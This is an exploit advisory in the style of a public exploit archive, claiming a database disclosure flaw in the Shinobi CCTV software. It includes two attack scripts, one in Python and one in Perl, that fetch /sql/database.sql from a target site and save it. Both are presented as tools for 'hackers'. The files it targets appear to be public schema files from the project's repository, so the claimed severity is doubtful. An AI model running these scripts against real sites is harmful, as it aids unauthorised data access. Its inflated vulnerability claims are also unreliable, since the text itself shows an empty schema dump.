zc6dgY8A

1###########################################################################
2
3# Exploit Title : Shinobi Security Software 1.0 Database Disclosure Exploit
4# Author [ Discovered By ] : KingSkrupellos
5# Team : Cyberizm Digital Security Army
6# Date : 02/04/2019
7# Vendor Homepage : shinobi.video
8# Software Download Link : github.com/moeiscool/Shinobi/archive/master.zip
9# Software Information Link : shinobi.video/docs/
10gitlab.com/Shinobi-Systems/ShinobiCE
11github.com/moeiscool/Shinobi
12# Software Version : 1.0 and latest version
13# Tested On : Windows and Linux
14# Category : WebApps
15# Exploit Risk : Medium
16# Vulnerability Type : 
17CWE-200 [ Information Exposure ]
18CWE-538 [ File and Directory Information Exposure ]
19# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
20# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
21# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
22# Acunetix Information Link about => phpMyAdmin SQL dump Web Vulnerability
23acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
24
25###########################################################################
26
27# Description about Software :
28***************************
29Shinobi is Open Source, written in Node.js, and real easy to use. It is the future of CCTV 
30
31and NVR for developers and end-users alike. It is catered to by professionals and most importantly 
32
33by the one who created it. Shinobi Community Edition (CE) is a GPLv3+AGPLv3 release of Shinobi. 
34
35The Free Open Source CCTV platform written in Node.JS (Camera Recorder - 
36
37Security Surveillance Software - Restreamer.
38
39###########################################################################
40
41# Impact :
42***********
43* The product stores sensitive information in files or directories that are accessible 
44
45to actors outside of the intended control sphere.
46
47* An information exposure is the intentional or unintentional disclosure of information 
48
49to an actor that is not explicitly authorized to have access to that information.
50
51* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 
52
53MySQL over the World Wide Web. It can be used to dump a database or a collection of 
54
55databases for backup or transfer to another SQL server (not necessarily a MySQL server). 
56
57The dump typically contains SQL statements to create the table, populate it, or both. 
58
59This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 
60
61should not be found on a production system.
62
63Installation :
64***********
65Fast Install (The Ninja Way)
66
67
68Become root to use the installer and run Shinobi. 
69
70Use one of the following to do so.
71
72Ubuntu 17.04, 17.10
73
74sudo su
75
76
77CentOS 7
78
79su
80
81
82MacOS 10.7(+)
83
84su
85
86
87
88
89
90Download 
91
92and run the installer.
93
94
95bash <(curl -s https://gitlab.com/Shinobi-Systems/Shinobi-Installer/raw
96
97/master/shinobi-install.sh)
98
99Elaborate Installs
100Installation Tutorials - http://shinobi.video/docs
101
102/start
103Troubleshooting Guide - http://shinobi.video/docs/start#trouble-section
104
105###########################################################################
106
107File :
108*****
109/sql/database.sql
110/default_data.sql
111/framework.sql
112/tables.sql
113/update-1-1-2017.sql
114/update-13-7-2017.sql	
115/update-17-5-2017.sql	
116/update-2-2-2017.sql
117/update-26-08-2017.sql
118/update-5-6-2017.sql
119/user.sql
120
121/sql/docker/01-framework.sql
122
123/sql/postgresql/default_data.sql
124/sql/postgresql/framework.sql
125/sql/postgresql/user.sql
126
127/sql/mssql/default_data.sql
128/sql/mssql/framework.sql
129/sql/mssql/user.sql
130
131/sql/sqlite3/framework.sql
132
133Information :  [ /sql/database.sql ]
134*********************************
135-- --------------------------------------------------------
136-- Host:                          Host IP Address
137-- Server version:            5.7.17-0ubuntu0.16.04.1 - (Ubuntu)
138-- Server OS:                  Linux
139-- HeidiSQL Version:      9.3.0.4984
140-- --------------------------------------------------------
141
142/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
143/*!40101 SET NAMES utf8mb4 */;
144/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
145/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
146
147-- Dumping database structure for ccio
148CREATE DATABASE IF NOT EXISTS `ccio` /*!40100 DEFAULT CHARACTER SET utf8 */;
149USE `ccio`;
150
151-- Data exporting was unselected.
152/*!40101 SET SQL_MODE=IFNULL(@OLD_SQL_MODE, '') */;
153/*!40014 SET FOREIGN_KEY_CHECKS=IF(@OLD_FOREIGN_KEY_CHECKS IS NULL, 1, @OLD_FOREIGN_KEY_CHECKS) */;
154/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
155
156###########################################################################
157
158# Database Disclosure Information Exposure Exploit 1 :
159***********************************************
160#!/usr/bin/python
161import string
162import re
163from urllib2 import Request, urlopen
164disc = "/sql/database.sql"
165url = raw_input ("URL: ")
166req = Request(url+disc)
167rta = urlopen(req)
168print "Result"
169html = rta.read()
170rdo = str(re.findall("resources.*=*", html))
171print rdo
172exit
173
174###########################################################################
175
176# Database Disclosure Information Exposure Exploit 2 :
177***********************************************
178#!/usr/bin/perl -w
179# Author : KingSkrupellos
180# Team : Cyberizm Digital Security Army
181
182use LWP::Simple;
183use LWP::UserAgent;
184
185system('cls');
186system('Shinobi Security Software 1.0 Database Disclosure Exploit');
187system('color a');
188
189
190if(@ARGV < 2)
191{
192print "[-]How To Use\n\n";
193&help; exit();
194}
195sub help()
196{
197print "[+] usage1 : perl $0 site.com /path/ \n";
198print "[+] usage2 : perl $0 localhost / \n";
199}
200($TargetIP, $path, $File,) = @ARGV;
201
202$File="sql/database.sql";
203my $url = "http://" . $TargetIP . $path . $File;
204print "\n Wait Please Dear Hacker!!! \n\n";
205
206my $useragent = LWP::UserAgent->new();
207my $request = $useragent->get($url,":content_file" => "D:/sql/database.sql");
208
209if ($request->is_success)
210{
211print "[+] $url Exploited!\n\n";
212print "[+] Database saved to D:/sql/database.sql\n";
213exit();
214}
215else
216{
217print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
218exit();
219}
220
221###########################################################################
222
223# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 
224
225###########################################################################